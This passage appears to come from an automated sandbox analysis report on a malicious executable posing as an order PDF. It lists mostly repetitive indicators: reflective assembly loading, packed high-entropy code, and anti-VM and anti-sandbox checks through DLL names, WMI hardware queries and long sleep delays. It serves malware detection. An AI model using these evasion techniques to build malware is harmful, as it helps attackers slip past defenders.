                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.11.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.13.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF92F5 push ds; ret 0_2_00DF9340
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF9347 push ds; ret 0_2_00DF934C
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 0_2_00DF9361 push ds; retf 0_2_00DF9364
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E9361 push ds; retf 3_2_003E9364
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E9347 push ds; ret 3_2_003E934C
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 3_2_003E92F5 push ds; ret 3_2_003E9340
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C92F5 push ds; ret 5_2_008C9340
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C9347 push ds; ret 5_2_008C934C
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeCode function: 5_2_008C9361 push ds; retf 5_2_008C9364
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.8848412694
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.31c735c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe PID: 7084, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661208274.0000000003298000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040Thread sleep count: 1168 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239872s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040Thread sleep count: 2873 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239761s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7076Thread sleep time: -35197s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -239047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238907s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -238219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -237141s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -236954s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -236594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -236094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -235204s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -235078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7060Thread sleep time: -234953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7064Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 4624Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044Thread sleep count: 890 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe TID: 7044Thread sleep count: 8962 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 240000Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239872Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239761Jump to behavior
                      Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exeThread delayed: delay time: 239656Jump to behavior
